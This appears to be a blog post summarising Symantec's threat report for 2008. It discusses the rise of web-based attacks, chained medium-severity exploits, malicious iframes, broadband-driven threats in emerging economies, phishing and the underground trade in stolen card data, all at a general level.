Halloween spam, 'Obama beat McCain' spam, 'Will you be my Spamentine', and the recent Conflicker spam... the world of web was never short of malicious activities throughout. However, the nature of attacks are evolving for sure.
In an age where everything from bill payment to banking has gone mobile and are carried over the net, computer-based attacks are giving way for web-based attacks. In a web-based mode, attacks are launched against users who visit legitimate web sites that have been compromised by attackers in order to serve malicious content.Thus attackers are on prowl for Internet users who are in abundant over the net, providing the formers an array of targets and means to carry out their activities.
Symantec's 'Global Internet Security Threat Report: Trends for 2008', says that in 2008 alone, there were 12,885 site-specific vulnerabilities identified and 63 per cent of those vulnerabilities documented.
The target of attack has evolved and so have the mode and the hands behind such attacks. Web-based threats have not only become widespread but also sophisticated. Unlike earlier, online underground economy today stands consolidated and matured such that they are able to rapidly adapt activities.
Eight of the top ten vulnerabilities exploited in 2008 were rated as medium severity ones. This shows that attackers are slowly imbibing a mode of lengthy and complicated step instead of single high-severity flaws.
While a single high-severity flaw can be exploited to fully compromise a user, attackers are now frequently stringing together multiple exploits for medium-severity vulnerabilities to achieve the same goal.
Symantec's report, released in April, notes that some of the common techniques used by attackers to compromise a website include exploiting a vulnerable web application running on the server (by attacking through improperly secured input fields), or exploiting some vulnerability present in the underlying host operating system.
Attackers can exploit these vulnerabilities in a website or underlying application to modify the pages served to users visiting the site. This can include directly serving malicious content from the site itself, or embedding a malicious iframe on pages that can redirect a user’s browser to another web server that is under the attacker’s control. In this way, the compromise of a single website can cause attacks to be launched against every visitor to that site.
The lengthy and complicated steps pursued to launch successful web-based attacks demonstrate the increasing complexity of methods used by attackers.
It goes without saying that severe situations are dealt with on war footing, whereas, medium and low-severity vulnerabilities are taken for granted. What if the severity is less but destruction is mass? Here lies the hole.
Users often make patching for high-severity vulnerabilities a top priority, while medium and low-severity vulnerabilities may be ignored. This could result in the possibility of more computers remaining exposed for longer periods to these vulnerabilities.
For example, of the 12,885 site-specific cross-site scripting vulnerabilities identified by Symantec in 2008, only 394 (around three per cent) are known to be fixed.
Medium severity vulnerabilities affecting client or desktop applications are often sufficient for an attacker to mount successful malicious attacks on individual end users as well as at the enterprise level.
Symantec expects malicious activity to be pushed to regions with emerging Internet infrastructures. Emerging economies are today in the look out for means to push broadband penetration. However, broadband is going to be a crucial factor and will reap both connectivity laurels and malicious activities if not dealt properly.
Malicious activity usually affects computers that are connected to high-speed broadband Internet because these connections are attractive targets for attackers. Broadband connections provide larger bandwidth capacities than other connection types, faster speeds, the potential of constantly connected systems, and typically more stable connections.
Such a situation appeals attackers as potential bases for hosting phishing websites, spam relays, and other malicious content. No wonder the developed nations – China USA and Germany – are the top in the list of spam generators.
The report finds that more than ever before, attackers are today concentrating on compromising end users for financial gain. In 2008, 78 per cent of confidential information were compromised for user data, and 76 per cent used a keystroke-logging component to steal information such as online banking account credentials.
Additionally, 76 per cent of phishing lures targeted brands in the financial services sector and this sector also had the most identities exposed due to data breaches. Similarly, 12 per cent of all data breaches that occurred in 2008 exposed credit card information.
This is likely due to the fact that there are numerous ways for credit card information to be stolen, and that stolen card data can be easily cashed out. This is because the underground economy has a well-established infrastructure for monetizing such information and specializing in manufacturing blank plastic cards with magnetic stripes destined to be encoded with stolen credit card and bankcard data.
Symantec expects that overt attack activities would either be abandoned or pushed further underground, i.e if the effort to set up malicious ISPs outweighs the return for attackers before being taken offline, it is likely that attackers would abandon this approach for other attack vectors in order to continue to evade detection and potential apprehension or prosecution.
Changes in the current threat landscape - such as the increasing complexity and sophistication of attacks, the evolution of attackers and attack patterns - are calling for a trend which, if not dealt promptly, would jeopardize the emerging world's security concerns.
With the increasing adaptability of malicious code developers and their ability to evade detection, it has become all the more important for the emerging economies to be on their toes, since they lack the resources to combat the growing involvement of organized crime in the online underground economy.
No comments:
Post a Comment